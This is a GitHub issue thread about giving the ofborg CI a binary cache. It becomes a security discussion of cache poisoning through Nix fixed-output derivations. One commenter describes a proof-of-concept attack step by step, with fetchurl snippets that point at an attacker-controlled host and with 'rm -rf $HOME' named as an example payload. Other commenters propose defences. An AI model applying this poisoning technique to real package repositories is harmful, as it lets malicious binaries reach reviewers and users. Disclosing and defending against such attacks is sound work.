Provide a binary cache for builds #68

Open
Mic92 opened this issue Feb 8, 2018 · 20 comments

@Mic92
Member

Mic92 commented Feb 8, 2018

It would be pretty cool if the builds of ofborg were also downloadable. Then maintainers could get quite a lot more pull requests tested in a shorter time.

If there were a URL from which an expression tarball could be downloaded, one could do something like the following (it should also be possible to provide an actual tarball URL for GitHub pull requests):

$ nix-shell 'https://gist.github.com/Mic92/93f65c4d42ac72c8d64397258cada90c/archive/0159f2d6894ea2928e0b05d6ee46349be81681d6.tar.gz' --command 'studio-link'
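
To sketch what the consumer side might look like if such a cache existed (the cache URL below is made up; its signing key would additionally have to be added to trusted-public-keys, this is only an illustration):

$ nix-shell 'https://gist.github.com/Mic92/93f65c4d42ac72c8d64397258cada90c/archive/0159f2d6894ea2928e0b05d6ee46349be81681d6.tar.gz' \
    --option extra-substituters 'https://ofborg-cache.example.org' \
    --command 'studio-link'
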
@Mic92 changed the title from "Provide a binary cache with builds" to "Provide a binary cache for builds" on Feb 8, 2018
@7c6f434c
Member

7c6f434c commented Feb 8, 2018

Wouldn't it make builders a more attractive compromise target? Asking as an operator of a part-time build machine, which I don't take good care of.

@grahamc
Member

grahamc commented Feb 8, 2018

@7c6f434c If this were turned on per-builder, would it make all builders an attractive target? I.e., if only the AWS machines were able to produce binaries, would you be uncomfortable running your own?

@7c6f434c
Member

7c6f434c commented Feb 8, 2018 via email

@domenkozar
Member

It seems best to have all builders under one owner (or a few, for redundancy) and then use something like https://cachix.org/ to provide a binary cache. In the future, Hydra might even reuse that if the Hydra owners == the ofborg builder owners.

@ncfavier
Member

ncfavier commented Aug 3, 2021

This would be great.

@Mic92
Member Author

Mic92 commented Aug 3, 2021

All builders are trusted now, AFAIK. I offered to help @grahamc set up Cachix but got no response so far.

@ncfavier
Member

ncfavier commented Aug 3, 2021

Does this actually require modifying ofborg, or could we just set up a cachix action somewhere?
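
For reference, the builder-side part with the stock cachix CLI would roughly look like this (the cache name "ofborg" and the attribute path are just placeholders, this is only a sketch):

  $ cachix use ofborg                               # configure the cache as a substituter on the consumer side
  $ nix-build -A somePackage | cachix push ofborg   # push the resulting store paths from a builder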

@Mic92
Member Author

Mic92 commented Aug 3, 2021

@domenkozar
Member

I'm happy to sponsor the cache for ofborg (I thought I had mentioned this here earlier, but I hadn't).

@tobiasBora

That would be great, but note that one should first solve NixOS/nix#969, otherwise this raises an important security issue: it basically allows any attacker (i.e. the person making a PR) to execute arbitrary code on the machine of the reviewer. The issue right now is that the cache is shared between all PRs on Ofborg (which makes sense), but combined with NixOS/nix#969 this can be quite dangerous: it is possible to send a malicious (not reviewed) PR containing malicious code inserted into some program with some hash malicioushash, and then send in a reviewed PR the legitimate change, except that the hash used is malicioushash instead of the valid hash. This way, the reviewer will run the malicious binary, even though the PR appears to point to a valid source.

@doronbehar
Contributor

@tobiasBora could you lay out how #969 could be abused for such an attack? I'm not sure I understand...

@tobiasBora

tobiasBora commented Apr 29, 2024

@doronbehar Sure, I even made a small example ^^

  1. First, the attacker creates a clone of the source of the program, whose official location is, say, http://foo.com/example.com/ (this is the URL I used in my tests; it does not exist, so if Ofborg does not complain, it means it used the attacker's URL), and adds some malicious code inside (say, code that executes rm -rf $HOME on startup). Say the malicious copy is hosted at http://example.com/ (this is what I used in my example; this one does exist).
  2. Then the attacker creates a dummy PR, like I did here: https://github.com/NixOS/nixpkgs/pull/307709/files. The exact content of the PR does not really matter; nobody will even need to review it, so the attacker can write a big "Work in progress" at the beginning to be sure nobody checks the content. What matters is that it downloads the malicious code with something like fetchurl (the hash used here is sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk= in my test), and that Ofborg tests it (as it did automatically in my case). This step has basically one goal: pollute Ofborg's cache with the malicious code.
  3. Then the attacker creates another PR, like I did here: https://github.com/NixOS/nixpkgs/pull/307725/files. This PR contains exactly the code of an honest PR, except that the hash used is not the true hash coming from the upstream project but the hash from step 2, sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk= in my example. As you can see, Ofborg passes all tests (even though the "official URL" does not even exist), meaning that it used the cache from the first PR.

As of today, if a reviewer tries to review this last PR, they will get an error, since the hash does not match the one obtained from the official URL. But if Ofborg and reviewers share the same cache (or, even worse, if Hydra and Ofborg share the same cache, which would allow the attack to be executed against any user of the program and not just the reviewer), then the reviewer will basically download the version built by Ofborg, i.e. the malicious one. Just trying to run the program (which is expected from most reviewers) will execute the rm -rf $HOME (or maybe something more subtle, like installing a keylogger)… not something I'd love to have, especially from an innocent-looking PR.
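
To make the mechanism concrete, here is a minimal sketch of the two fetches involved (the tarball file name is made up; the URLs and the hash are the ones from the example above):

  # PR 1 (the dummy PR): fetches the attacker-controlled copy, so its contents
  # end up in the shared cache under this output hash.
  src = fetchurl {
    url = "http://example.com/program-1.0.tar.gz";          # attacker-controlled host
    hash = "sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk=";
  };

  # PR 2 (the honest-looking PR): points at the official URL but reuses the same
  # hash. The store path of a fixed-output derivation is computed (essentially)
  # from its name and declared output hash only, so a store or cache that already
  # has an output for that path serves it as-is and the official URL is never
  # contacted.
  src = fetchurl {
    url = "http://foo.com/example.com/program-1.0.tar.gz";  # official URL, never fetched
    hash = "sha256-6o+sfGX7WJsNU1YPUlH3T56bJDR43Laz6nm142RJyNk=";
  };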

I just sent an email to the security team with other potential attacks related to #969 that can already be executed now (but in a slightly more convoluted manner); let's see what they say.

@Mic92
Member Author

Mic92 commented Apr 30, 2024

By the way, we have the same issue in nixpkgs if the attacker controls any package source in nixpkgs and creates a malicious release that contains both the source of the actual package and the source of a second package, modified in a malicious way.

@Mic92
Member Author

Mic92 commented Apr 30, 2024

So what I think we need is some CI check that will try to download any fixed-output derivation that is new and verify that it gets the same hash.
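
Roughly, for every new or changed fixed-output derivation in a PR, the check could run something like this (the attribute path is only a placeholder; --check rebuilds a derivation even if a valid or substituted output already exists and fails on a mismatch):

  # re-fetch the source from its declared URL and let Nix compare the result
  # against the declared hash, instead of trusting an already-present copy
  $ nix-build --check -A somePackage.src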

@tobiasBora

By the way, we have the same issue in nixpkgs if the attacker controls any package source in nixpkgs and creates a malicious release that contains both the source of the actual package and the source of a second package, modified in a malicious way.

Yes, exactly; that was basically part of what I wrote in the email to the security maintainers ^^ (along with some other attacks, e.g. ones relying on obfuscated, automatically generated files).

So what I think we need is some CI check that will try to download any fixed-output derivation that is new and verify that it gets the same hash.

Why should this be a CI check? The attacks would still be possible if I just used a fork of nixpkgs without going through CI… and maybe reviewers would not wait for the CI to finish before testing the PR themselves. Can't we directly modify Nix's way of handling fixed-output derivations, by basically re-running them whenever a previously unseen derivation is encountered? (Seems quite straightforward, no?)

@doronbehar
Contributor

Can't we directly modify Nix's way of handling fixed-output derivations, by basically re-running them whenever a previously unseen derivation is encountered? (Seems quite straightforward, no?)

Sounds not too hard to me either, but the question is: what would you consider an "unseen derivation"? Would you simply make Nix rebuild all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

@Mic92
Member Author

Mic92 commented Apr 30, 2024

Why should this be a CI check? The attacks would still be possible if I just used a fork of nixpkgs without going through CI… and maybe reviewers would not wait for the CI to finish before testing the PR themselves. Can't we directly modify Nix's way of handling fixed-output derivations, by basically re-running them whenever a previously unseen derivation is encountered? (Seems quite straightforward, no?)

I mean, I am talking about how to protect at least cache.nixos.org against cache poisoning.

@Mic92
Member Author

Mic92 commented Apr 30, 2024

Can't we directly modify Nix's way of handling fixed-output derivations, by basically re-running them whenever a previously unseen derivation is encountered? (Seems quite straightforward, no?)

Sounds not too hard to me either, but the question is: what would you consider an "unseen derivation"? Would you simply make Nix rebuild all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

We only use the cache if we have verified that a given <url> produces a given <hash> and it is not part of cache.nixos.org.

@tobiasBora

We only use the cache if we have verified that a given <url> produces a given <hash> and it is not part of cache.nixos.org.

That would indeed be the safest option, but I'm thinking that it might be quite inefficient, as it means that we need to download the sources of all the transitive dependencies before even considering downloading something from cache.nixos.org… One could maybe add an option --paranoid for this behavior, and we could maybe enable it for cache.nixos.org itself (this should not add much overhead anyway, since it has basically already downloaded everything), but this seems quite hard to enforce on the end user… I'm trying to see if we can imagine a solution that is both safe and has minimal overhead.

Would you simply make Nix rebuild all FODs that are not found in the local cache? Would you consider Hydra's cache safe?

That's a good question. I think we should trust caches like cache.nixos.org (at least once they implement a fix for this issue, since a malicious cache could do anything anyway), but I don't think that the information currently shared by caches is enough. Indeed, for now, the cache says something like "I have a derivation whose hash is foohash, but I don't know how it was generated"… which is exactly the same information that Nix already gives you and which, as we saw before, is not secure.

So, in my opinion, both users and caches should keep a table derivation path -> hash, and caches should share this table with users. This way, when a user wants to install a program:

  1. First, whenever it finds a FOD (dependency, source…), it checks in its local table whether derivation -> hash is present. If it is present but not correct, abort. If it is present and correct, go to step 4.
  2. If it is not present, check whether derivation -> hash is present in the cache. Again, check correctness if present and go to step 4.
  3. If it is still not present, execute the FOD locally and check that the hash is correct; otherwise abort.
  4. Once all dependencies have been checked, the rest is as usual: compute the final hash of the program as usual and ask the binary cache whether it is present. If so, download it; otherwise build it.

Note that one could make this algorithm more efficient (so far it uses many rounds of communication with the server, which is not great) by sending a single message to the server with the list of all FODs that could not be checked locally, along with their expected hashes. If the server sees a single hash mismatch, it aborts; otherwise it sends back the list of FODs that it could not check.

Hope it makes sense!

@risicle
Contributor

risicle commented May 6, 2024

So what I think we need is some CI check that will try to download any fixed-output derivation that is new and verify that it gets the same hash.

I am currently working on such a thing.
